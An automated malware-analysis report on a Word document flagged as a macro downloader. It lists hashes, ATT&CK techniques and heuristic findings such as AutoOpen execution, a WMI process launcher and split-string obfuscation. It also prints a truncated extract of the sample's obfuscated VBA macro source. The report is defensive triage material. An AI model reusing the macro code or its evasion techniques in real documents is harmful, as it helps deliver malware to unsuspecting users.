Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5cb8575c41a90132…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 198.1 KB
Created: 2019-04-30 09:31:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: fadd359148ce096d477de03af1c86670
SHA-1: 04e6f7fa7671a4ec974cd88669ab697bc28c095b
SHA-256: 5cb8575c41a90132e26b37da86d4c36b7d7e9dc7167f3297005cad53c9932f5b
Risk score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

This Office document contains VBA macros with an autoopen subroutine. The macro uses GetObject and CreateObject to launch a process via WMI, specifically through the Win32_Process class, which indicates an attempt to download and execute a second-stage payload. Keyword-splitting obfuscation, in which a string such as 'winmgmts' is assembled from fragments so that it never appears as a single literal, is also present.

Heuristics (9)

  • ClamAV: Doc.Downloader.00536d-6958656-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6958656-0
  • VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 39188 bytes
    SHA-256: f2fdb18505984762056130554818558afade6dbf76d74fe582650634eb089260

Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "sCUxAAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lG4cwD"
Attribute VB_Base = "0{EBC644D4-E386-413C-908E-8481485EB75E}{EC580E15-8A81-4B78-88AB-84AAC279D031}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "TUUBC1A"
Attribute VB_Base = "0{3167F5AA-0D09-48E8-85A9-2ACA6C93CB70}{EEF0353F-884E-4D91-BC63-4F5627EB9542}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MxwAUDA"
Sub autoopen()
   If HU41ADUZ = L4AZXAUU Then
ElseIf tCUAcc4C = RAAUUAQ Then
            PBQUB_UZ = Hex(JADBBxwx + CSng(C_AGUA / Tan(970737797 + 556162569)))
ElseIf nCAoxXDQ = dZADAAAU Then
            ZAAcAAAk = Atn(679437309) + Int(131615049)
ElseIf zAkwUXQA = tBABAAA Then
            ODo1AZ = 448721800 + Atn(136639462)
End If
   If GXAAADA_ = kAcAAQ Then
ElseIf hXAxZAA = iC1cDU Then
            DAQBAQ = Hex(XCZA1Q + CSng(HxAQDU_ / Tan(462506023 + 246436896)))
ElseIf a4w44o4 = bAZA4oAZ Then
            pkAABDG = Atn(326522074) + Int(129585114)
ElseIf D4AXAQw = NUA4oDZ4 Then
            hcA4XA = 883858803 + Atn(693918168)
End If
jQAAxZ_
   If FQBXU_U = UZUo1BAA Then
ElseIf bAoQXAB = JAAx1G Then
            rCACwUBA = Hex(MD1xBBA + CSng(KAUDBAD / Tan(289954362 + 68963466)))
ElseIf UXoAAUA = iADcA4 Then
            IDwQAX = Atn(192828462) + Int(178883383)
ElseIf I4kDQBU = XGwXAQ Then
            HUUAcBDk = 722919832 + Atn(361484891)
End If
   If EAGG1A1 = iwxAD_ Then
ElseIf BQBQQD = vUAQAA_A Then
            VDQ4kA = Hex(jABoAc + CSng(JQwUBB_ / Tan(747333040 + 376130019)))
ElseIf PABA4AA = iAGUUDU Then
            CcADAB = Atn(691073589) + Int(205421895)
ElseIf t4AwQBD = twkUAwAA Then
            OXAAGA4 = 820586426 + Atn(212776036)
End If
End Sub
Function KwDCUk(JUAAAAAA)
   If YAGAXU = woAAAD Then
ElseIf PBDBXkA = fAZ1A1k Then
            NwBwACZC = Hex(oGXoAAk + CSng(rDDUDBB / Tan(648705149 + 949573156)))
ElseIf iAC1BAQD = DAZDQAA Then
            zADQCAA = Atn(495369129) + Int(231476101)
ElseIf PBDAQB = CAQxXCQA Then
            qxAQDoQ = 217618812 + Atn(159211596)
End If
   If X41CAAc = jAAUZx Then
ElseIf rQAUAQ = OQDCUwxo Then
            KcGB4A = Hex(PDxAQ1A + CSng(TocxD_ / Tan(169904674 + 341042040)))
ElseIf UZAAQQ1 = iAADQxw_ Then
            zAADXA = Atn(9222619) + Int(949679386)
ElseIf aQwDQw = P_1wZcAQ Then
            JxBxUkwQ = 361956331 + Atn(147205240)
End If
Set KwDCUk = CVar(JUAAAAAA)
   If DDAZAcBB = LxcxxAQ Then
ElseIf HoAx_Qxc = J_xAA_4Z Then
            MU4XAQCw = Hex(zC_Q4o + CSng(ocAcoA / Tan(555200342 + 907486524)))
ElseIf rQUA4A = OAUCBAAZ Then
            A_k11B = Atn(710272978) + Int(195646544)
ElseIf aUAUAA = pXDAAB Then
            RBU4ADA = 332618772 + Atn(894355665)
End If
   If PAADAC = cA1Q1A_ Then
ElseIf ZAGAxAAB = vGxQwA Then
            Vw_GAQZ = Hex(fGQAAoAA + CSng(z1AAQw / Tan(863611492 + 19546555)))
ElseIf JDxGAAD = JAADAGAA Then
            pQU44A = Atn(334802405) + Int(489768733)
ElseIf XoQQkUQG = jZcxAAAA Then
            SDABAQ__ = 418002456 + Atn(23872221)
End If
   If HQCBXko1 = VAU4Xx Then
ElseIf GUUQAB = LU_AAw1 Then
            sU1CkBA = Hex(UBAxAA1 + CSng(SxDADwB / Tan(903309971 + 473274309)))
ElseIf FXCxxAA = zoAcAX Then
            K4AA1ACD = Atn(210664378) + Int(814378656)
ElseIf TwDc__ = ux_AB4Z Then
            ToXAoU = 876606067 + Atn(79912719)
End If
End Function

Attribute VB_Name = "MBAU__A"
Function jQAAxZ_()
On Error Resume Next
   If CAABAAoX = jBXGABBZ Then
ElseIf AQ4AGAcD = ZXZAAx Then
            vZ4AG
... (truncated)